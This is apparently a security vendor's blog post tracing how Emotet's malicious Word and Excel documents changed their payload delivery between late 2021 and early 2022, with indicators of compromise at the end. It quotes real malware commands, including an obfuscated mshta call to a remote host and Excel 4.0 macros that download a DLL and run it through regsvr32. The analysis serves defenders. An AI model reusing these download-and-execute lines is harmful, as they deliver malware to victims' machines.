Emotet is a malware that is spread mainly via e-mail spam campaigns. A typical spam email contains an infected/weaponized document. This document acts as the initial vector that downloads/drops the actual malware and compromises the user’s machine. In this blog, we will be explaining how Emotet uses Maldocs, password-protected obfuscated macros and the changes done to the same to download the actual payload along with the timeline of the activity starting from November 2021, when it was back after a hiatus, till the time of writing this blog.

November 2021

Emotet started sending malicious documents through emails which had password protected VBA macros and the template is as shown in Figure 1.

Figure 1: Word templates used by maldocs in Nov 2021

VBA Macros contained in the “.docm” file, first invokes cmd.exe to run powershell.exe with the following command

Snippet 1: PowerShell command to download and execute the Emotet DLL

This command will access all the websites stored in the variable $strs and if the Emotet DLL is found, it will download the payload DLL into C:\ProgramData\ as ‘<random-name>.dll’. After downloading, the DLL will be executed with the help of C:\Windows\SysWow64\rundll32.exe.

Figure 2: Execution flow of maldoc

Following lure was used in Excel files to trick users into enabling the macros in it. We can notice that Excel is also mispronounced. However, VBA macros were the same for both Excel and Word files.

Figure 3: Excel sheet lure


December 2021

Most of the Emotet related maldocs were seen to be dropping a .bat file. Instead of using readable commands, threat actors had obfuscated the commands within the batch script. The .bat file is then executed via CMD .

Figure  4: .bat file being dropped in C:\ProgramData
Figure 5: Obfuscated batch commands in the dropped .bat file

When the .bat file is executed, it creates a PowerShell process with a base64 encoded PowerShell command. But the final PowerShell command remains similar as seen above in Snippet 1.



Snippet 2: Base64 encoded PowerShell command

Snippet 3: Decoded PowerShell command

December 2021 – January 2022

During late December and January 2022, Emotet related maldocs were seen to execute html files present on the malicious site as shown in Snippet 4 with the help of mshta.exe as it can execute the JavaScript present in the html file.

Following command was executed during execution of word or excel files 

cmd /c m^sh^t^a h^tt^p^:/^/87[.]251[.]86[.]1/pp/pp.html

Snippet 4: Cmd command executed through macros

The JavaScript present contacts the html file, resulting in the execution of the following obfuscated PowerShell command shown in Snippet 5. 

Snippet 5: PowerShell command obfuscated by the string “Google”
Snippet 6:   Deobfuscated Snippet 5 PowerShell command

If we notice Snippet 6 closely, the PowerShell command tries to contact a URL ”hxxp:// 87[.]251[.]86[.]178/pp /PP.PNG” to get the content from a .png file which is suspicious. The downloaded .png file is not what it is supposed to be, but is a PowerShell script as shown in Figure 6.

Figure 6: Content of PP.png

This command is similar to the original command that Emotet directly stores in VBA macros. However, an extra step of complexity is now employed by the threat actor to evade detection.

February 2022

It was noticed that instead of dropping just the .bat file, an obfuscated VBScript was dropped and  was executed by wscript.exe as we can see in Figure 7

Figure 7: Procmon logs showing Excel file dropping .vbs and .bat files
Figure 8: Deobfuscated VBScript

From Figure 8, we can glean that the dropped VBScript is responsible for executing both the .bat file that was dropped and the Emotet DLL file that was downloaded. The .bat file contains an obfuscated PowerShell command which is also base64 encoded. After base64 decoding, we got the following command:

Snippet 7: Base64 decoded PowerShell command

The PowerShell command shown in Snippet 7, is used to access all websites stored in the variable “gjsebngukiwug3kwjd” which downloads the Emotet DLL and places it in C:\ProgramData so that the earlier dropped VBScript as shown in Figure 8, is able to execute the DLL with the help of rundll32.exe.

February – March 2022

During late February and March, Emotet related maldocs were seen using just Excel Macros 4.0 instead of VBA macros, since excel allows to run functions from cells which enabled the threat actors to obfuscate Emotet macros using different hidden sheets and widespread cells.

Figure 9: Hidden macro sheets
Figure 10: Obfuscated macros present in the hidden sheets

After deobfuscation the macros looked like what is shown below:

=CALL(“urlmon”,”URLDownloadToFileA”,”JJCCBB”,0,” https://dev[.]subs2me[.]com/wp-includes/EMa/”,”..\dw1.ocx”,0,0)

=EXEC(“C:\Windows\SysWow64\regsvr32.exe -s ..\dw1.ocx”)


Snippet 8: Deobfuscated Excel macros

As we can see from the macro in Snippet 8, the Excel file first calls a function named URLDownloadToFileA which is present in the dll urlmon.dll with the required parameters url: hxxps://dev[.]subs2me[.]com/wp-includes/EMa/ and file name: dw1.ocx.

Figure 11: Procmon log showing excel file contacting payload sites mentioned in the macros

After getting the .ocx file which is the Emotet dll it is then executed with the help of regsvr32.exe.

If you notice throughout the campaigns, what the threat actors wanted to achieve remained the same viz. to download the Emotet DLL and to execute it. However, the techniques they are using to get this done has been changing consistently so as to evade behaviour based detections. Users should exercise caution whenever they try to open Excel/Word files from unknown sources. Also, use a reputable security product like “K7 Total Security” which provides protection from such malware. Also keep your security product updated to stay safe from the latest threats.

Indicators of Compromise (IOCs)


Hash Detection Name
8625BAE7CF49EAA789A4E837B124E864  Trojan ( 0058ce181 )
2B8055CA8B0F93226B13F15CA83ADF41 Trojan ( 0001140e1 )
6983B7390889217D8F57CF218835DCE4  Trojan ( 0058cef41 )
B6E9028801480B692E04A6297F4E3CFC  Trojan ( 0001140e1 )
00BD27A66D752E35A41CB7CE82524C3C  Trojan ( 0058ce181 )





























http:// 87[.]251[.]86[.]178/pp /PP.PNG




Like what you're reading? Subscribe to our top stories.

If you want to subscribe to our monthly newsletter, please submit the form below.

    0 replies on “Diving into the Emotet Maldoc Boutade”